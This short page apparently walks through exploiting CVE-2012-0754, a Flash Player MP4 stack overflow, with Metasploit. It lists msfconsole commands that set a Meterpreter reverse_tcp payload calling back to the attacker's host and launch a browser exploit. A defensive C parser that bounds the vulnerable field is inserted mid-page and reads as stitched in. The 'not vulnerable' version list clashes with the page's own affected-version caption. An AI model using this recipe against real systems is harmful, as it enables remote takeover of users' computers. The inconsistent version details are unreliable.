Adobe Flash Player: New Security Vulnerability

【Not vulnerable】

Adobe Flash Player 11.1.115.6

Adobe Flash Player 11.1.111.6

Adobe Flash Player 11.1.102.6

【README - Metasploit Modules】

This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing an MP4 file (specifically the Sequence Parameter Set), Flash checks whether pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies the data in offset_for_ref_frame onto the stack, which allows arbitrary remote code execution in the context of the user.
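The missing check described above, as an added example (not code from the original page, from Flash Player or from Metasploit): a C parser for the named SPS fields that enforces the H.264 limit of 255 on num_ref_frames_in_pic_order_cnt_cycle before filling offset_for_ref_frame. It assumes an already-unescaped SPS RBSP with profile_idc 66, 77 or 88; parse_sps_poc, bits_t and the sample arrays are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_POC_CYCLE 255 /* H.264 limit on num_ref_frames_in_pic_order_cnt_cycle */
typedef struct { const uint8_t *p; size_t nbits, pos; int err; } bits_t;

/* Constructed samples (not captured data): baseline SPS with a cycle of 2, and of 256. */
static const uint8_t SAMPLE_OK[]  = {0x42, 0x00, 0x1E, 0xD3, 0x69, 0x80};
static const uint8_t SAMPLE_BIG[] = {0x42, 0x00, 0x1E, 0xD3, 0x00, 0x80, 0x80};

static uint32_t get_bits(bits_t *b, int n) {
    uint32_t v = 0;
    while (n-- > 0) {
        if (b->pos >= b->nbits) { b->err = 1; return 0; } /* never read past the input */
        v = (v << 1) | ((b->p[b->pos >> 3] >> (7 - (b->pos & 7))) & 1u);
        b->pos++;
    }
    return v;
}
static uint32_t get_ue(bits_t *b) { /* unsigned Exp-Golomb, ue(v) */
    int zeros = 0;
    while (!b->err && get_bits(b, 1) == 0)
        if (++zeros > 31) b->err = 1; /* prefix too long for 32 bits */
    if (b->err) return 0;
    return zeros ? (1u << zeros) - 1 + get_bits(b, zeros) : 0;
}
static int32_t get_se(bits_t *b) { /* signed Exp-Golomb, se(v) */
    uint32_t k = get_ue(b);
    return (k & 1) ? (int32_t)((k + 1) / 2) : -(int32_t)(k / 2);
}

/* Returns offsets stored (0..255), -1 if malformed/unsupported, -2 if the count is over the limit. */
int parse_sps_poc(const uint8_t *rbsp, size_t len, int32_t offs[MAX_POC_CYCLE]) {
    bits_t b = { rbsp, len * 8, 0, 0 };
    uint32_t profile = get_bits(&b, 8);   /* profile_idc */
    get_bits(&b, 16);                     /* constraint flags, level_idc */
    get_ue(&b);                           /* seq_parameter_set_id */
    if (profile != 66 && profile != 77 && profile != 88) return -1; /* assumption: no chroma fields */
    get_ue(&b);                           /* log2_max_frame_num_minus4 */
    uint32_t poc_type = get_ue(&b);       /* pic_order_cnt_type */
    if (b.err || poc_type > 2) return -1;
    if (poc_type != 1) return 0;          /* no offset_for_ref_frame list */
    get_bits(&b, 1);                      /* delta_pic_order_always_zero_flag */
    get_se(&b);                           /* offset_for_non_ref_pic */
    get_se(&b);                           /* offset_for_top_to_bottom_field */
    uint32_t n = get_ue(&b);              /* num_ref_frames_in_pic_order_cnt_cycle */
    if (b.err) return -1;
    if (n > MAX_POC_CYCLE) return -2;     /* bound the count before the copy */
    for (uint32_t i = 0; i < n; i++) offs[i] = get_se(&b); /* offset_for_ref_frame[i] */
    return b.err ? -1 : (int)n;
}
```

A return value of -2 is the case worth logging or alerting on in a media-scanning pipeline, since a conforming encoder never produces it.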

【modules】

adobe_flash_mp4_cprt

【command】

msfupdate && msfconsole

search adobe_mp4

use exploit/windows/browser/adobe_flash_mp4_cprt

show options

[Image: CVE-2012-0754 Flash Player on Metasploit <11.1.105.55 Remote Code Execution>]

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST MY_IP

set URIPATH /

exploit

[Image: CVE-2012-0754 Flash Player on Metasploit <11.1.105.55 Remote Code Execution>]

【supportate】

[Image: CVE-2012-0754 Flash Player on Metasploit <11.1.105.55 Remote Code Execution>]